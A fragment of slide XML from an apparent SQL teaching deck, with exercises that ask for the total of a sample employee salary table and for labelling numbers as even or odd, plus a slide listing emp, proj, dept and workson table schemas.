            <a:endParaRPr b="1" sz="3177">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3221" name="Google Shape;3221;p520"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="439275" y="1069775"/>
            <a:ext cx="13461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emp</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>_tbl</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1800">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3222" name="Google Shape;3222;p520"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6793529" y="1069775"/>
            <a:ext cx="17463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Final Output</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1800">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="3223" name="Google Shape;3223;p520"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="161000" y="1437425"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:tableStyleId>{4096D094-DB0B-4A9D-8F5E-8AE1A14F7588}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="720875"/>
                <a:gridCol w="745975"/>
                <a:gridCol w="914400"/>
              </a:tblGrid>
              <a:tr h="238125">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="120000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="200"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1300">
                          <a:solidFill>
                            <a:srgbClr val="DC143C"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>empId</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1300">
                        <a:solidFill>
                          <a:srgbClr val="DC143C"/>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300">
                          <a:solidFill>
                            <a:srgbClr val="DC143C"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>EName</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1300">
                        <a:solidFill>
                          <a:srgbClr val="DC143C"/>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300">
                          <a:solidFill>
                            <a:srgbClr val="DC143C"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Salary</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1300">
                        <a:solidFill>
                          <a:srgbClr val="DC143C"/>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ctr">
                        <a:lnSpc>
                          <a:spcPct val="120000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="200"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1200">
                          <a:solidFill>
                            <a:srgbClr val="6AA84F"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>1</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Anil</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10000</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ctr">
                        <a:lnSpc>
                          <a:spcPct val="120000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="200"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1200">
                          <a:solidFill>
                            <a:srgbClr val="6AA84F"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>2</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Anjali</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60000</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ctr">
                        <a:lnSpc>
                          <a:spcPct val="120000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="200"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1200">
                          <a:solidFill>
                            <a:srgbClr val="6AA84F"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>3</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Alpika</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30000</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ctr">
                        <a:lnSpc>
                          <a:spcPct val="120000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="200"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1200">
                          <a:solidFill>
                            <a:srgbClr val="6AA84F"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>4</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Nidhi</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50000</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ctr">
                        <a:lnSpc>
                          <a:spcPct val="120000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="200"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1200">
                          <a:solidFill>
                            <a:srgbClr val="6AA84F"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>5</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Ambika</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25000</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ctr">
                        <a:lnSpc>
                          <a:spcPct val="120000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="200"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1200">
                          <a:solidFill>
                            <a:srgbClr val="6AA84F"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>6</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Rahul</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45000</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ctr">
                        <a:lnSpc>
                          <a:spcPct val="120000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="200"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1200">
                          <a:solidFill>
                            <a:srgbClr val="6AA84F"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>7</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Ravi</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ctr">
                        <a:lnSpc>
                          <a:spcPct val="120000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="200"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1200">
                          <a:solidFill>
                            <a:srgbClr val="6AA84F"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>55000</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1200">
                        <a:solidFill>
                          <a:srgbClr val="6AA84F"/>
                        </a:solidFill>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bl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3224" name="Google Shape;3224;p520"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2684450" y="1437425"/>
            <a:ext cx="3899400" cy="335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0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="3000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="10162F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Your task is to write a query for this table that’ll return the total salary of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="10162F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>employees.</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:srgbClr val="10162F"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="3225" name="Google Shape;3225;p520"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6929138" y="1593225"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:tableStyleId>{4096D094-DB0B-4A9D-8F5E-8AE1A14F7588}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1215125"/>
              </a:tblGrid>
              <a:tr h="238125">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="120000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="200"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1200">
                          <a:solidFill>
                            <a:srgbClr val="DC143C"/>
                          </a:solidFill>
                          <a:highlight>
                            <a:srgbClr val="FFFFFF"/>
                          </a:highlight>
                        </a:rPr>
                        <a:t>Total Salary</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1200">
                        <a:solidFill>
                          <a:srgbClr val="DC143C"/>
                        </a:solidFill>
                        <a:highlight>
                          <a:srgbClr val="FFFFFF"/>
                        </a:highlight>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ctr">
                        <a:lnSpc>
                          <a:spcPct val="120000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="200"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1200">
                          <a:highlight>
                            <a:srgbClr val="FFFFFF"/>
                          </a:highlight>
                          <a:latin typeface="Times New Roman"/>
                          <a:ea typeface="Times New Roman"/>
                          <a:cs typeface="Times New Roman"/>
                          <a:sym typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>275000</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1200">
                        <a:highlight>
                          <a:srgbClr val="FFFFFF"/>
                        </a:highlight>
                        <a:latin typeface="Times New Roman"/>
                        <a:ea typeface="Times New Roman"/>
                        <a:cs typeface="Times New Roman"/>
                        <a:sym typeface="Times New Roman"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="73025" marL="73025" anchor="ctr">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bl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>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sp>
        <p:nvSpPr>
          <p:cNvPr id="3230" name="Google Shape;3230;p52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lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1500"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3000">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQL Assignment - Even or odd</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3000">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3231" name="Google Shape;3231;p521"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="134475" y="1145975"/>
            <a:ext cx="13461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my_tbl</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1800">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3232" name="Google Shape;3232;p521"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7403129" y="1069775"/>
            <a:ext cx="17463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Final Output</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1800">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="3233" name="Google Shape;3233;p521"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="413250" y="1755075"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:tableStyleId>{4096D094-DB0B-4A9D-8F5E-8AE1A14F7588}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="285750"/>
                <a:gridCol w="628650"/>
              </a:tblGrid>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id</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200">
                        <a:highlight>
                          <a:srgbClr val="FFFFFF"/>
                        </a:highlight>
                        <a:latin typeface="Times New Roman"/>
                        <a:ea typeface="Times New Roman"/>
                        <a:cs typeface="Times New Roman"/>
                        <a:sym typeface="Times New Roman"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="73025" marL="730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Value</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200">
                        <a:highlight>
                          <a:srgbClr val="FFFFFF"/>
                        </a:highlight>
                        <a:latin typeface="Times New Roman"/>
                        <a:ea typeface="Times New Roman"/>
                        <a:cs typeface="Times New Roman"/>
                        <a:sym typeface="Times New Roman"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="73025" marL="730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1</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4</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11</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3</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57</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4</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24</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419100">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5</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0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1200">
                          <a:highlight>
                            <a:srgbClr val="FFFFFF"/>
                          </a:highlight>
                          <a:latin typeface="Times New Roman"/>
                          <a:ea typeface="Times New Roman"/>
                          <a:cs typeface="Times New Roman"/>
                          <a:sym typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>47</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200">
                        <a:highlight>
                          <a:srgbClr val="FFFFFF"/>
                        </a:highlight>
                        <a:latin typeface="Times New Roman"/>
                        <a:ea typeface="Times New Roman"/>
                        <a:cs typeface="Times New Roman"/>
                        <a:sym typeface="Times New Roman"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <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bl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="3234" name="Google Shape;3234;p521"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="7709463" y="1725275"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:tableStyleId>{4096D094-DB0B-4A9D-8F5E-8AE1A14F7588}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="354250"/>
                <a:gridCol w="779375"/>
              </a:tblGrid>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id</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200">
                        <a:highlight>
                          <a:srgbClr val="FFFFFF"/>
                        </a:highlight>
                        <a:latin typeface="Times New Roman"/>
                        <a:ea typeface="Times New Roman"/>
                        <a:cs typeface="Times New Roman"/>
                        <a:sym typeface="Times New Roman"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="73025" marL="730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Value</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200">
                        <a:highlight>
                          <a:srgbClr val="FFFFFF"/>
                        </a:highlight>
                        <a:latin typeface="Times New Roman"/>
                        <a:ea typeface="Times New Roman"/>
                        <a:cs typeface="Times New Roman"/>
                        <a:sym typeface="Times New Roman"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="73025" marL="73025" anchor="b">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1</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4-even</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11-odd</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3</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57-odd</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238125">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4</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24-even</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r h="419100">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="120000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="200"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1200">
                          <a:highlight>
                            <a:srgbClr val="FFFFFF"/>
                          </a:highlight>
                          <a:latin typeface="Times New Roman"/>
                          <a:ea typeface="Times New Roman"/>
                          <a:cs typeface="Times New Roman"/>
                          <a:sym typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>5</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c>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="120000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="1200">
                          <a:highlight>
                            <a:srgbClr val="FFFFFF"/>
                          </a:highlight>
                          <a:latin typeface="Times New Roman"/>
                          <a:ea typeface="Times New Roman"/>
                          <a:cs typeface="Times New Roman"/>
                          <a:sym typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>47-odd</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200">
                        <a:highlight>
                          <a:srgbClr val="FFFFFF"/>
                        </a:highlight>
                        <a:latin typeface="Times New Roman"/>
                        <a:ea typeface="Times New Roman"/>
                        <a:cs typeface="Times New Roman"/>
                        <a:sym typeface="Times New Roman"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:t/>
                      </a:r>
                      <a:endParaRPr sz="1200">
                        <a:highlight>
                          <a:srgbClr val="FFFFFF"/>
                        </a:highlight>
                        <a:latin typeface="Times New Roman"/>
                        <a:ea typeface="Times New Roman"/>
                        <a:cs typeface="Times New Roman"/>
                        <a:sym typeface="Times New Roman"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="73025" marL="73025">
                    <a:lnL cap="flat" cmpd="sng" w="8475">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="sm" w="sm" type="none"/>
                      <a:tailEnd len="sm" w="sm" type="none"/>
                    </a:lnL>
                    <a:lnR cap="flat" cmpd="sng" w="8475">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="sm" w="sm" type="none"/>
                      <a:tailEnd len="sm" w="sm" type="none"/>
                    </a:lnR>
                    <a:lnT cap="flat" cmpd="sng" w="8475">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="sm" w="sm" type="none"/>
                      <a:tailEnd len="sm" w="sm" type="none"/>
                    </a:lnT>
                    <a:lnB cap="flat" cmpd="sng" w="8475">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:round/>
                      <a:headEnd len="sm" w="sm" type="none"/>
                      <a:tailEnd len="sm" w="sm" type="none"/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3235" name="Google Shape;3235;p521"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1532950" y="1725275"/>
            <a:ext cx="5870100" cy="28260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3000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="10162F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Your job is to return whether or not the number in the Value column is even or odd rather than returning the number itself. Your query should return the following values:</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:srgbClr val="10162F"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="3000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="3000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="10162F"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>4-even, 11-odd, 57-odd, 24-even, 47-odd</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>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sp>
        <p:nvSpPr>
          <p:cNvPr id="3240" name="Google Shape;3240;p522"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="270275" y="1400475"/>
            <a:ext cx="8588100" cy="338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chemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Consider the sample tables:</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2900">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>emp (eno, ename, bdate, title, salary, dno)</a:t>
            </a:r>
            <a:endParaRPr sz="2900">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2900">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>proj (pno, pname, budget, dno) </a:t>
            </a:r>
            <a:endParaRPr sz="2900">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2900">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dept (dno, dname, mgreno)</a:t>
            </a:r>
            <a:endParaRPr sz="2900">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2900">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>workson (eno, pno, resp, hours)</a:t>
            </a:r>
            <a:endParaRPr sz="2900">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3241" name="Google Shape;3241;p522"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="957300" y="611325"/>
            <a:ext cx="73161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SQL Assignments 2</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4800">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>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5" name="Shape 3245"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3246" name="Google Shape;3246;p523"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
